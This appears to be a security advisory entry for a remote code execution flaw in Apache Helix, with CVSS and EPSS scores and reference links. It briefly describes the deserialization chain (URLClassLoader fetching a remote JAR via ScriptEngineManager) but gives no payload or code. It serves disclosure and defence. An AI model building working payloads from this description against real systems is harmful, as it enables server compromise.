9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.002 Low
EPSS
Percentile
55.3%
org.apache.helix:helix-core and org.apache.helix:helix-rest are vulnerable to Remote Code Execution (RCE). The vulnerable SnakeYAML
component could be used by an attacker to deserialize Java.net.URLClassLoader
and instruct it to load a JAR from a certain URL before deserializing Javax.script.ScriptEngineManager
will use that ClassLoader to load the code, which allows remote code execution as a result of this unbounded deserialization flaw.
github.com/advisories/GHSA-jhcr-hph9-g7wm
github.com/apache/helix/commit/09d210fa29b18f3b4de8d32f2369dc2b31f71f43
github.com/apache/helix/commit/eabfda26b18c72f4f945dcaac5756665c6a2cdac
github.com/apache/helix/pull/2398
github.com/apache/helix/pull/2399
lists.apache.org/thread/zyqxhv0lc2z9w3tgr8ttrdy2zfh5jvc4